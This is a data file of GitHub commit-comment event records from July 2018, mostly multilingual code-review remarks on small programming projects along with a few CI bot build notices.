{"id":"7967628697","type":"CommitCommentEvent","actor":{"login":"davyd0309"},"repo":{"name":"KursJava/My_Notepad"},"payload":{"comment":{"id":29713471,"position":23,"line":23,"path":"src/main/java/Frame.java","commit_id":"6465d6fdbe7195c217a23b1a57ebbbe7c6e3578e","created_at":"2018-07-15T16:48:03Z","updated_at":"2018-07-15T16:48:03Z","author_association":"NONE","body":"Wyrzuć tworzenie ramki do metody."}},"created_at":"2018-07-15T16:48:03Z"}
{"id":"7967629095","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"adobe-type-tools/psautohint"},"payload":{"comment":{"id":29713473,"position":null,"line":null,"path":null,"commit_id":"675977f1d8afdeedd771fd7b48934a5c353108cf","created_at":"2018-07-15T16:48:23Z","updated_at":"2018-07-15T16:48:23Z","author_association":"MEMBER","body":"Thanks, it works for me now. I see new buttons to restart the build which weren’t there before"}},"created_at":"2018-07-15T16:48:23Z"}
{"id":"7967630151","type":"CommitCommentEvent","actor":{"login":"davyd0309"},"repo":{"name":"KursJava/My_Notepad"},"payload":{"comment":{"id":29713477,"position":29,"line":29,"path":"src/main/java/Frame.java","commit_id":"6465d6fdbe7195c217a23b1a57ebbbe7c6e3578e","created_at":"2018-07-15T16:49:22Z","updated_at":"2018-07-15T16:49:22Z","author_association":"NONE","body":"Dlaczego metody creteComponent itd masz publiczne skoro używasz tylko w tej klasie ?"}},"created_at":"2018-07-15T16:49:22Z"}
{"id":"7967633717","type":"CommitCommentEvent","actor":{"login":"davyd0309"},"repo":{"name":"KursJava/My_Notepad"},"payload":{"comment":{"id":29713481,"position":135,"line":135,"path":"src/main/java/Frame.java","commit_id":"6465d6fdbe7195c217a23b1a57ebbbe7c6e3578e","created_at":"2018-07-15T16:52:33Z","updated_at":"2018-07-15T16:52:33Z","author_association":"NONE","body":"Niech każdy z tych if będzie metodą, bo na tą chwilę nie wiadomo co to robi. Wydziel to do metod prywatnych i nazwij odpowiednio żeb y było wiadomo co się dzieje jeżeli program wchodzi do ifa"}},"created_at":"2018-07-15T16:52:33Z"}
{"id":"7967635557","type":"CommitCommentEvent","actor":{"login":"baxandrei"},"repo":{"name":"NamelessMC/Nameless"},"payload":{"comment":{"id":29713482,"position":null,"line":null,"path":null,"commit_id":"de8a8c52099f729be9a774d1c2b8b775ff97e9dd","created_at":"2018-07-15T16:54:15Z","updated_at":"2018-07-15T16:54:15Z","author_association":"CONTRIBUTOR","body":"thanx."}},"created_at":"2018-07-15T16:54:15Z"}
{"id":"7967638218","type":"CommitCommentEvent","actor":{"login":"DeVini"},"repo":{"name":"DeVini/ExerciciosPhp"},"payload":{"comment":{"id":29713484,"position":null,"line":null,"path":null,"commit_id":"27f030657d308019ba4b0aede24de2a24eecc376","created_at":"2018-07-15T16:56:46Z","updated_at":"2018-07-15T16:56:46Z","author_association":"OWNER","body":"Esse commit removeu o require da classe TextWratTest "}},"created_at":"2018-07-15T16:56:46Z"}
{"id":"7967638383","type":"CommitCommentEvent","actor":{"login":"SilverDia"},"repo":{"name":"SilverDia/best-chess-ever"},"payload":{"comment":{"id":29713485,"position":5,"line":4,"path":"chess-servlet-api/src/main/webapp/project/js/script.js","commit_id":"19afff5c23718c658d40073de88f31702da69ec6","created_at":"2018-07-15T16:56:54Z","updated_at":"2018-07-15T16:56:54Z","author_association":"OWNER","body":"???"}},"created_at":"2018-07-15T16:56:54Z"}
{"id":"7967638582","type":"CommitCommentEvent","actor":{"login":"Youkai-no-nii-chan"},"repo":{"name":"AlexanderUglov/SimpleAlgorithms"},"payload":{"comment":{"id":29713487,"position":26,"line":30,"path":"SimpleAlgorithms/ListsTesting/Testing/TestingFour.cs","commit_id":"af77e095f93d8e325dde349e94c96915fffe546e","created_at":"2018-07-15T16:57:08Z","updated_at":"2018-07-15T16:57:08Z","author_association":"COLLABORATOR","body":"Вместо списка всех чисел с пометкой простое оно или нет, можно просто сохранять в списке только простые числа. Так быстрее будет работать и меньше места жрать.\r\nА еще лучше поправить возвращаемый тип на `IEnumerable<int>` и использовать yield return. Тогда мы вообще не  будем хранить  массива всех простых чисел. Только текущее число. Хотя, конечно, все равно понадобится куча места на seive "}},"created_at":"2018-07-15T16:57:08Z"}
{"id":"7967642658","type":"CommitCommentEvent","actor":{"login":"InitialFail"},"repo":{"name":"InitialFail/driftin-bots"},"payload":{"comment":{"id":29713499,"position":null,"line":null,"path":null,"commit_id":"12bfa4aa0dd04d4634687aa8703f777bdc07725e","created_at":"2018-07-15T17:00:35Z","updated_at":"2018-07-15T17:00:35Z","author_association":"OWNER","body":"If by \"last part\" you mean opening in separate Chrome user data directories, then just launch Chrome multiple times with different `--user-data-dir` values like `--user-data-dir=/tmp/profile01`, `--user-data-dir=/tmp/profile02`, `--user-data-dir=/tmp/profile03`, etc. If you're still confused, you should learn about the command line."}},"created_at":"2018-07-15T17:00:35Z"}
{"id":"7967642763","type":"CommitCommentEvent","actor":{"login":"Youkai-no-nii-chan"},"repo":{"name":"AlexanderUglov/SimpleAlgorithms"},"payload":{"comment":{"id":29713500,"position":31,"line":35,"path":"SimpleAlgorithms/ListsTesting/Testing/TestingFour.cs","commit_id":"af77e095f93d8e325dde349e94c96915fffe546e","created_at":"2018-07-15T17:00:40Z","updated_at":"2018-07-15T17:00:40Z","author_association":"COLLABORATOR","body":"Можно этот цикл убрать, если мы инициализировать seive следующим образом (ну и я ему тут сразу более понятное имя даю):\r\n```\r\nvar isNotPrime = new bool[number + 1];\r\nisNotPrime[0] = true;\r\nisNotPrime[1] = true;\r\n```\r\nПо умолчанию все значения в массиве забиваются нулями. То есть во всех остальных полях изначально будет false."}},"created_at":"2018-07-15T17:00:40Z"}
{"id":"7967644676","type":"CommitCommentEvent","actor":{"login":"Youkai-no-nii-chan"},"repo":{"name":"AlexanderUglov/SimpleAlgorithms"},"payload":{"comment":{"id":29713502,"position":34,"line":38,"path":"SimpleAlgorithms/ListsTesting/Testing/TestingFour.cs","commit_id":"af77e095f93d8e325dde349e94c96915fffe546e","created_at":"2018-07-15T17:02:05Z","updated_at":"2018-07-15T17:02:05Z","author_association":"COLLABORATOR","body":"А почему `k * k <= number`? Нам же нужно найти все простые числа вплоть до `number`"}},"created_at":"2018-07-15T17:02:05Z"}
{"id":"7967645689","type":"CommitCommentEvent","actor":{"login":"Nandan36"},"repo":{"name":"Nandan36/My-pract"},"payload":{"comment":{"id":29713503,"position":null,"line":null,"path":null,"commit_id":"5a9ac75722a1f17fc3a77027467e67c9c31a5d8e","created_at":"2018-07-15T17:02:54Z","updated_at":"2018-07-15T17:02:54Z","author_association":"OWNER","body":"Nandan this looks fine, add some other text and see"}},"created_at":"2018-07-15T17:02:54Z"}
{"id":"7967645889","type":"CommitCommentEvent","actor":{"login":"malob"},"repo":{"name":"kiwix/tools"},"payload":{"comment":{"id":29713504,"position":null,"line":null,"path":null,"commit_id":"a2e7f6d6b6b8e58c9d5a8c0dcebb0916fb0b765e","created_at":"2018-07-15T17:03:07Z","updated_at":"2018-07-15T17:03:07Z","author_association":"NONE","body":"@kelson42, it sure is annoying how possible the \"impossible\" is sometimes 😛.\r\n\r\nI had my money on that `shift` being the problem, but don't know Perl very well so wasn't very confident.\r\n\r\nThanks for looking into it, and fixing this so quickly!"}},"created_at":"2018-07-15T17:03:07Z"}
{"id":"7967647929","type":"CommitCommentEvent","actor":{"login":"ringgaard"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29713513,"position":51,"line":74,"path":"sling/nlp/parser/parser.cc","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-15T17:04:53Z","updated_at":"2018-07-15T17:04:53Z","author_association":"COLLABORATOR","body":"Remove debug output."}},"created_at":"2018-07-15T17:04:53Z"}
{"id":"7967648239","type":"CommitCommentEvent","actor":{"login":"Youkai-no-nii-chan"},"repo":{"name":"AlexanderUglov/SimpleAlgorithms"},"payload":{"comment":{"id":29713515,"position":54,"line":58,"path":"SimpleAlgorithms/ListsTesting/Testing/TestingFour.cs","commit_id":"af77e095f93d8e325dde349e94c96915fffe546e","created_at":"2018-07-15T17:05:09Z","updated_at":"2018-07-15T17:05:09Z","author_association":"COLLABORATOR","body":"Ты всегда выделяешь решето в 2000000 элементов, даже если тебе нужно будет только первые 100 элементов найти. Плюс оно неправильно будет работать, если я захочу найти все простые числа, например, до 2000001 включительно.\r\nНадо передавать сюда N, введенное пользователем"}},"created_at":"2018-07-15T17:05:09Z"}
{"id":"7967648407","type":"CommitCommentEvent","actor":{"login":"otherwise777"},"repo":{"name":"otherwise777/Temporal_Graph_library"},"payload":{"comment":{"id":29713516,"position":null,"line":null,"path":null,"commit_id":"d724d8883c551317af3acf1f7d065d429056fa82","created_at":"2018-07-15T17:05:14Z","updated_at":"2018-07-15T17:05:14Z","author_association":"OWNER","body":"Tbh, i have no idea anymore, it's been quite a while since i looked at the\ncode\n\nBest regards,\nWouter Ligtenberg\nGame designer at Onzichtbaar Developers\n\n\nOn Fri, Jul 13, 2018 at 5:15 PM, stephen <notifications@github.com> wrote:\n\n> what effects will the distribution bug cause?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/otherwise777/Temporal_Graph_library/commit/d724d8883c551317af3acf1f7d065d429056fa82#commitcomment-29701407>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACVONoHDPaI-InGqtFvq5LO8vyLn1GA_ks5uGLmjgaJpZM4VPD7->\n> .\n>\n"}},"created_at":"2018-07-15T17:05:14Z"}
{"id":"7967649870","type":"CommitCommentEvent","actor":{"login":"Youkai-no-nii-chan"},"repo":{"name":"AlexanderUglov/SimpleAlgorithms"},"payload":{"comment":{"id":29713523,"position":65,"line":69,"path":"SimpleAlgorithms/ListsTesting/Testing/TestingFour.cs","commit_id":"af77e095f93d8e325dde349e94c96915fffe546e","created_at":"2018-07-15T17:06:26Z","updated_at":"2018-07-15T17:06:26Z","author_association":"COLLABORATOR","body":"По условию тебе нужно вывести все простые числа <= N. Ты тут не это делаешь."}},"created_at":"2018-07-15T17:06:26Z"}
{"id":"7967652466","type":"CommitCommentEvent","actor":{"login":"ayakauleu"},"repo":{"name":"ayakauleu/java-courses"},"payload":{"comment":{"id":29713531,"position":15,"line":15,"path":"lesson3/src/Homework3.java","commit_id":"57bdbdcb5b8487693a0328cca1f736a2b332b525","created_at":"2018-07-15T17:08:37Z","updated_at":"2018-07-15T17:08:37Z","author_association":"OWNER","body":"вроде нет: \r\nEnter quantity of days: 3\r\nNow enter the whole collection: 3 3 5\r\nAmong 3 days there was 11 precipitation amount with the 5 maximum and 3,666667 average\r\n\r\n"}},"created_at":"2018-07-15T17:08:37Z"}
{"id":"7967653826","type":"CommitCommentEvent","actor":{"login":"ChenLiYinGoGo"},"repo":{"name":"ChenLiYinGoGo/microconfig"},"payload":{"comment":{"id":29713534,"position":null,"line":null,"path":null,"commit_id":"8d5695eb1958776be32b03a99108580b46d32737","created_at":"2018-07-15T17:09:45Z","updated_at":"2018-07-15T17:09:45Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-15T17:09:45Z"}
{"id":"7967654022","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29713535,"position":null,"line":null,"path":null,"commit_id":"13773bd2c653d353762ea62ae79bb403cab68011","created_at":"2018-07-15T17:09:56Z","updated_at":"2018-07-15T17:09:56Z","author_association":"NONE","body":"develop (Myoldmopar) - Win64-Windows-7-VisualStudio-14: OK (2318 of 2318 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13773bd2c653d353762ea62ae79bb403cab68011-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-13773bd2c653d353762ea62ae79bb403cab68011-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-15T17:09:56Z"}
{"id":"7967656266","type":"CommitCommentEvent","actor":{"login":"JessyD"},"repo":{"name":"OpenSourceBrain/WilsonCowan"},"payload":{"comment":{"id":29713537,"position":null,"line":null,"path":null,"commit_id":"eab320ff23cdc675561629153d7a75386363a444","created_at":"2018-07-15T17:11:44Z","updated_at":"2018-07-15T17:11:44Z","author_association":"CONTRIBUTOR","body":"@pgleeson: I was working on including the calculation for the isoclines on the NeuroML/LEMS code. For simplicity, I started with the case where the Wilson and Cowan model is dimensionless. \r\n\r\nThis is the logic I implemented:\r\n1. Defined a new component on RateBased.xml called isoclineDL that calculates the rate for the isoclines\r\n2. Added the parameters for calculating the isocline on WC_ParametersDL.xml\r\n3. If the parameter -isocline is passed to `GenerateWilsonCowanLEMS.py` the script creates a new LEMS/NeuroML description with two Networks -- one that describes the E-I population and how they are connected and one describing just the isoclines. The idea was then to run the simulation for each individual Network separately. It seems, however, that I can only specify one Simulation per file. Is that correct?\r\n\r\nYou can simulate the different behaviours and analyse the different outputs that I obtain by running `GenerateWilsonCowanLEMS.py -ie0 0 -ii0 0` and `GenerateWilsonCowanLEMS.py -ie0 0 -ii0 0 -isocline`. When running `GenerateWilsonCowanLEMS.py -ie0 0 -ii0 0 -isocline` `net2` seems to overwrite the description of `net1`. "}},"created_at":"2018-07-15T17:11:44Z"}
{"id":"7967656511","type":"CommitCommentEvent","actor":{"login":"Youkai-no-nii-chan"},"repo":{"name":"AlexanderUglov/SimpleAlgorithms"},"payload":{"comment":{"id":29713538,"position":23,"line":27,"path":"SimpleAlgorithms/ListsTesting/Testing/TestingFour.cs","commit_id":"af77e095f93d8e325dde349e94c96915fffe546e","created_at":"2018-07-15T17:11:57Z","updated_at":"2018-07-15T17:11:57Z","author_association":"COLLABORATOR","body":"Ну и Testing подразумевает, что надо тесты на этот метод написать."}},"created_at":"2018-07-15T17:11:57Z"}
{"id":"7967656780","type":"CommitCommentEvent","actor":{"login":"lkm027"},"repo":{"name":"lkm027/peer_review_system"},"payload":{"comment":{"id":29713539,"position":null,"line":null,"path":null,"commit_id":"3495b46737cbf1a361c951c411ad356ce78b6e06","created_at":"2018-07-15T17:12:11Z","updated_at":"2018-07-15T17:12:11Z","author_association":"OWNER","body":"This closes #1 . As of right now, the only information that is tracked is the users email meaning that the users could simply place in another users email and this would allow them to sign in as a different user. I am opening a new issue to address this and fix this \"feature\"."}},"created_at":"2018-07-15T17:12:11Z"}
{"id":"7967657947","type":"CommitCommentEvent","actor":{"login":"ringgaard"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29713541,"position":24,"line":47,"path":"sling/nlp/parser/parser.cc","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-15T17:13:09Z","updated_at":"2018-07-15T17:13:09Z","author_association":"COLLABORATOR","body":"It would be nicer to look up the frame fields by handles:\r\n```\r\n Handle n_type = store->Lookup(\"/table/action/type\");\r\n Handle n_delegate = store->Lookup(\"/table/action/delegate\");\r\n Handle n_length = store->Lookup(\"/table/action/length\");\r\n Handle n_source = store->Lookup(\"/table/action/source\");\r\n Handle target = store->Lookup(\"/table/action/target\");\r\n Handle n_label = store->Lookup(\"/table/action/label\");\r\n Handle n_role = store->Lookup(\"/table/action/role\");\r\n\r\n for (int i = 0; i < actions.length(); ++i) {\r\n   ParserAction action;\r\n   Frame frame(store, actions.get(i));\r\n   action.type = static_cast<ParserAction::Type>(frame.GetInt(h_type));\r\n   action.delegate = frame.GetInt(h_delegate);\r\n   action.length = frame.GetInt(h_length);\r\n   action.source = frame.GetInt(h_source);\r\n   action.target = frame.GetInt(h_target);\r\n   action.label = frame.GetHandle(h_label\");\r\n   action.role = frame.GetHandle(h_role);\r\n   actions_.push_back(action);\r\n  }\r\n```\r\n\r\n"}},"created_at":"2018-07-15T17:13:09Z"}
{"id":"7967658240","type":"CommitCommentEvent","actor":{"login":"DeVini"},"repo":{"name":"DeVini/ExerciciosPhp"},"payload":{"comment":{"id":29713542,"position":null,"line":null,"path":null,"commit_id":"caef86e99925f3c73bb8f567e01f7db48ef3132e","created_at":"2018-07-15T17:13:22Z","updated_at":"2018-07-15T17:13:22Z","author_association":"OWNER","body":"Esse commit atualiza a classe de teste do projeto"}},"created_at":"2018-07-15T17:13:22Z"}
{"id":"7967658673","type":"CommitCommentEvent","actor":{"login":"Dhjaru"},"repo":{"name":"L0ndinium/End-of-a-New-Beginning"},"payload":{"comment":{"id":29713543,"position":5,"line":226,"path":"toi/localisation/state_names_l_english.yml","commit_id":"f1d66dba64a56a448c6532674bcec4c6f85678c2","created_at":"2018-07-15T17:13:42Z","updated_at":"2018-07-15T17:13:42Z","author_association":"NONE","body":"well this is wrong...\r\n"}},"created_at":"2018-07-15T17:13:42Z"}
{"id":"7967659369","type":"CommitCommentEvent","actor":{"login":"KalilDev"},"repo":{"name":"aadiiii/device_xiaomi_msm8956-common"},"payload":{"comment":{"id":29713546,"position":null,"line":null,"path":null,"commit_id":"24032468b3876228a75930a5f85d948f163b7773","created_at":"2018-07-15T17:14:16Z","updated_at":"2018-07-15T17:14:16Z","author_association":"NONE","body":"am I too late to cringe over this?"}},"created_at":"2018-07-15T17:14:16Z"}
{"id":"7967659463","type":"CommitCommentEvent","actor":{"login":"Dhjaru"},"repo":{"name":"L0ndinium/End-of-a-New-Beginning"},"payload":{"comment":{"id":29713548,"position":29,"line":850,"path":"toi/localisation/victory_points_l_english.yml","commit_id":"f1d66dba64a56a448c6532674bcec4c6f85678c2","created_at":"2018-07-15T17:14:21Z","updated_at":"2018-07-15T17:14:21Z","author_association":"NONE","body":"well this too...\r\n"}},"created_at":"2018-07-15T17:14:21Z"}
{"id":"7967659669","type":"CommitCommentEvent","actor":{"login":"ringgaard"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29713549,"position":67,"line":94,"path":"sling/nlp/parser/parser.h","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-15T17:14:31Z","updated_at":"2018-07-15T17:14:31Z","author_association":"COLLABORATOR","body":"There is no need to have a factory method for the cascade since it is never subclassed."}},"created_at":"2018-07-15T17:14:31Z"}
{"id":"7967659729","type":"CommitCommentEvent","actor":{"login":"Dhjaru"},"repo":{"name":"L0ndinium/End-of-a-New-Beginning"},"payload":{"comment":{"id":29713550,"position":38,"line":1013,"path":"toi/localisation/victory_points_l_english.yml","commit_id":"f1d66dba64a56a448c6532674bcec4c6f85678c2","created_at":"2018-07-15T17:14:34Z","updated_at":"2018-07-15T17:14:34Z","author_association":"NONE","body":"and this..."}},"created_at":"2018-07-15T17:14:34Z"}
{"id":"7967660584","type":"CommitCommentEvent","actor":{"login":"ringgaard"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29713553,"position":179,"line":270,"path":"sling/nlp/parser/parser.h","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-15T17:15:17Z","updated_at":"2018-07-15T17:15:17Z","author_association":"COLLABORATOR","body":"You can change this to static allocation and initialize it in the constructor. "}},"created_at":"2018-07-15T17:15:17Z"}
{"id":"7967661155","type":"CommitCommentEvent","actor":{"login":"ringgaard"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29713555,"position":162,"line":240,"path":"sling/nlp/parser/parser.h","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-15T17:15:45Z","updated_at":"2018-07-15T17:15:45Z","author_association":"COLLABORATOR","body":"You don't need this destructor if you use static allocation (se below)."}},"created_at":"2018-07-15T17:15:45Z"}
{"id":"7967662872","type":"CommitCommentEvent","actor":{"login":"ringgaard"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29713559,"position":13,"line":36,"path":"sling/nlp/parser/parser.cc","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-15T17:17:08Z","updated_at":"2018-07-15T17:17:08Z","author_association":"COLLABORATOR","body":"We should have the delegate implementations separate from the parser. The parser should not depend on any specific implementations."}},"created_at":"2018-07-15T17:17:08Z"}
{"id":"7967663711","type":"CommitCommentEvent","actor":{"login":"mahadevTW"},"repo":{"name":"nikhil-patare007/Array-Examples"},"payload":{"comment":{"id":29713561,"position":7,"line":7,"path":"Tables.java","commit_id":"5cbb4137f6d3d235f3b278b71c54f5b47d9c1f7f","created_at":"2018-07-15T17:17:50Z","updated_at":"2018-07-15T17:17:50Z","author_association":"NONE","body":"Our aim for Array  was to even create elements of required size?\r\nDo you need each sub array to have same length as 9? \r\nCorrect it"}},"created_at":"2018-07-15T17:17:50Z"}
{"id":"7967663781","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29713562,"position":null,"line":null,"path":null,"commit_id":"180821b213e175ee8b05976898f1c26fd66dc253","created_at":"2018-07-15T17:17:54Z","updated_at":"2018-07-15T17:17:54Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-139](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-139).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-139-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-15T17:17:54Z"}
{"id":"7967664794","type":"CommitCommentEvent","actor":{"login":"ringgaard"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29713569,"position":91,"line":114,"path":"sling/nlp/parser/parser.cc","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-15T17:18:51Z","updated_at":"2018-07-15T17:18:51Z","author_association":"COLLABORATOR","body":"It would be nicer if the spec contained the actual cell name for the delegate."}},"created_at":"2018-07-15T17:18:51Z"}
{"id":"7967665344","type":"CommitCommentEvent","actor":{"login":"ringgaard"},"repo":{"name":"google/sling"},"payload":{"comment":{"id":29713570,"position":93,"line":116,"path":"sling/nlp/parser/parser.cc","commit_id":"a2ca0166c0f11c8114455e81d26451e02bb95446","created_at":"2018-07-15T17:19:17Z","updated_at":"2018-07-15T17:19:17Z","author_association":"COLLABORATOR","body":"What is \"runtime\" used for?"}},"created_at":"2018-07-15T17:19:17Z"}
{"id":"7967665973","type":"CommitCommentEvent","actor":{"login":"mahadevTW"},"repo":{"name":"nikhil-patare007/Array-Examples"},"payload":{"comment":{"id":29713575,"position":6,"line":6,"path":"ArrayE6.java","commit_id":"5cbb4137f6d3d235f3b278b71c54f5b47d9c1f7f","created_at":"2018-07-15T17:19:51Z","updated_at":"2018-07-15T17:19:51Z","author_association":"NONE","body":"int element will have default value as 0, no need to initialize it"}},"created_at":"2018-07-15T17:19:51Z"}
{"id":"7967668061","type":"CommitCommentEvent","actor":{"login":"carlosperate"},"repo":{"name":"bbcmicrobit/micropython"},"payload":{"comment":{"id":29713577,"position":4,"line":46,"path":"source/microbit/modos.c","commit_id":"5e1e6bb2475473813916ba8c4c50dcd8c3d3cabd","created_at":"2018-07-15T17:21:30Z","updated_at":"2018-07-15T17:21:30Z","author_association":"CONTRIBUTOR","body":"@dpgeorge any specific reason the `v` was removed?\r\nThis is perfectly fine, as technically the v is not part of semver, just wondering if that was the reason."}},"created_at":"2018-07-15T17:21:30Z"}
{"id":"7967677391","type":"CommitCommentEvent","actor":{"login":"ShmooDude"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29713608,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-15T17:29:36Z","updated_at":"2018-07-15T17:29:36Z","author_association":"NONE","body":"Oh, ok, I see now.  I forgot to delete the refresh needed there (was in a rush since I wasn't going to be able to code for a bit).  The point of the max refresh was to replace that which is kind of what you had above.  Probably why I was confused as to your need for the change.  It was supposed to look like:\r\n\r\n```\r\nlet guid = OvaleGUID.UnitGUID(\"target\") || OvaleGUID.UnitGUID(\"focus\");\r\nthis.timeSinceLastUpdate = this.timeSinceLastUpdate + elapsed;\r\nlet refresh = OvaleDebug.trace || this.timeSinceLastUpdate > Ovale.db.profile.apparence.minFrameRefresh / 1000 && next(Ovale.refreshNeeded) || guid && this.timeSinceLastUpdate > Ovale.db.profile.apparence.maxFrameRefresh / 1000;\r\n```\r\n\r\nBut looking over what you had again I think I agree with most of it.  I would just remove the `incombat` check from the min refresh and the out of combat max refresh:\r\n```\r\n        let inCombat = baseState.current.inCombat;\r\n        this.timeSinceLastUpdate = this.timeSinceLastUpdate + elapsed;\r\n        let refresh = this.visible && (\r\n            OvaleDebug.trace || \r\n            this.timeSinceLastUpdate > Ovale.db.profile.apparence.minFrameRefresh / 1000 && next(Ovale.refreshNeeded) || \r\n            (inCombat || !inCombat && UnitCanAttack(\"player\", \"target\")) && this.timeSinceLastUpdate > Ovale.db.profile.apparence.maxFrameRefresh / 1000 \r\n        );\r\n```\r\n\r\nIn case you didn't know, Ovale tracks the refresh intervals for the last 500 frame refreshes (min, max and average).  You can access this through `/ovale refresh`."}},"created_at":"2018-07-15T17:29:36Z"}
{"id":"7967678379","type":"CommitCommentEvent","actor":{"login":"mahadevTW"},"repo":{"name":"nikhil-patare007/Array-Examples"},"payload":{"comment":{"id":29713614,"position":4,"line":4,"path":"ArrayE1.java","commit_id":"bb9ddf691737c75333fb7e451fe697ae3fe6a440","created_at":"2018-07-15T17:30:21Z","updated_at":"2018-07-15T17:30:21Z","author_association":"NONE","body":"can you change it to single line return"}},"created_at":"2018-07-15T17:30:21Z"}
{"id":"7967678751","type":"CommitCommentEvent","actor":{"login":"mahadevTW"},"repo":{"name":"nikhil-patare007/Array-Examples"},"payload":{"comment":{"id":29713615,"position":4,"line":4,"path":"ArrayE1.java","commit_id":"bb9ddf691737c75333fb7e451fe697ae3fe6a440","created_at":"2018-07-15T17:30:40Z","updated_at":"2018-07-15T17:30:40Z","author_association":"NONE","body":"try doin that, so that you will understand returning expressions"}},"created_at":"2018-07-15T17:30:40Z"}
{"id":"7967679548","type":"CommitCommentEvent","actor":{"login":"timkrumenacker"},"repo":{"name":"timkrumenacker/kiwiirc-themes"},"payload":{"comment":{"id":29713616,"position":null,"line":null,"path":null,"commit_id":"d8339c565404e6c76b9142f3ddb0fb9d7d5ffa01","created_at":"2018-07-15T17:31:16Z","updated_at":"2018-07-15T17:31:16Z","author_association":"OWNER","body":"oops, indentation fixes have been applied in a previous commit..."}},"created_at":"2018-07-15T17:31:16Z"}
{"id":"7967680148","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29713618,"position":null,"line":null,"path":null,"commit_id":"b85c0cdf353399d01aa97ce07ed7b7d80d2cca66","created_at":"2018-07-15T17:31:44Z","updated_at":"2018-07-15T17:31:44Z","author_association":"OWNER","body":"### 函数即变量\r\n匿名函数：lambda x:x**2  (在内存中会立即被回收）"}},"created_at":"2018-07-15T17:31:44Z"}
{"id":"7967681197","type":"CommitCommentEvent","actor":{"login":"carlosperate"},"repo":{"name":"bbcmicrobit/micropython"},"payload":{"comment":{"id":29713619,"position":4,"line":46,"path":"source/microbit/modos.c","commit_id":"5e1e6bb2475473813916ba8c4c50dcd8c3d3cabd","created_at":"2018-07-15T17:32:37Z","updated_at":"2018-07-15T17:32:37Z","author_association":"CONTRIBUTOR","body":"https://github.com/bbcmicrobit/micropython/issues/534\r\n"}},"created_at":"2018-07-15T17:32:37Z"}
{"id":"7967681362","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29713620,"position":null,"line":null,"path":null,"commit_id":"b85c0cdf353399d01aa97ce07ed7b7d80d2cca66","created_at":"2018-07-15T17:32:45Z","updated_at":"2018-07-15T17:32:45Z","author_association":"OWNER","body":"### Decorater 1:\r\n```\r\n#Downtiser\r\n\r\nimport time\r\n\r\ndef timer(func):  #通过后续@timer时将未经装饰的text1的地址传入赋给func\r\n    def deco():\r\n        start_time=time.time()\r\n        func()\r\n        end_time=time.time()\r\n        print('run time>>>',end_time-start_time)\r\n    return deco  #@timer语句结束后,text1被重新赋值为deco的地址\r\n\r\n@timer                     #这四句代码等价于：def text1():\r\ndef text1():               #                   time.sleep(2)\r\n    time.sleep(2)          #                   print('this is text1')\r\n    print('this is text1') #              text1=timer(text1)\r\n\r\ntext1()\r\n```"}},"created_at":"2018-07-15T17:32:45Z"}
{"id":"7967681563","type":"CommitCommentEvent","actor":{"login":"Tursaanpoika"},"repo":{"name":"Furtif/POGOProtos"},"payload":{"comment":{"id":29713621,"position":null,"line":null,"path":null,"commit_id":"308761f93aa55c09524123608cb6223bdbab1977","created_at":"2018-07-15T17:32:57Z","updated_at":"2018-07-15T17:32:57Z","author_association":"NONE","body":"Something funky happened with genders. I use POGOProtos to decompile the GAME_MASTER file and try to keep up to date with this. But instead of \r\n\r\n> item_templates {\r\n  template_id: \"SPAWN_V0001_POKEMON_BULBASAUR\"\r\n  gender_settings {\r\n    pokemon: BULBASAUR\r\n    gender {\r\n      male_percent: 0.875\r\n      female_percent: 0.125\r\n    }\r\n  }\r\n}\r\n\r\nI get \r\n\r\n> item_templates {\r\n  template_id: \"SPAWN_V0001_POKEMON_BULBASAUR\"\r\n  gender_settings {\r\n    pokemon: BULBASAUR\r\n    gender {\r\n      1: 0x3f600000\r\n      2: 0x3e000000\r\n    }\r\n  }\r\n}"}},"created_at":"2018-07-15T17:32:57Z"}
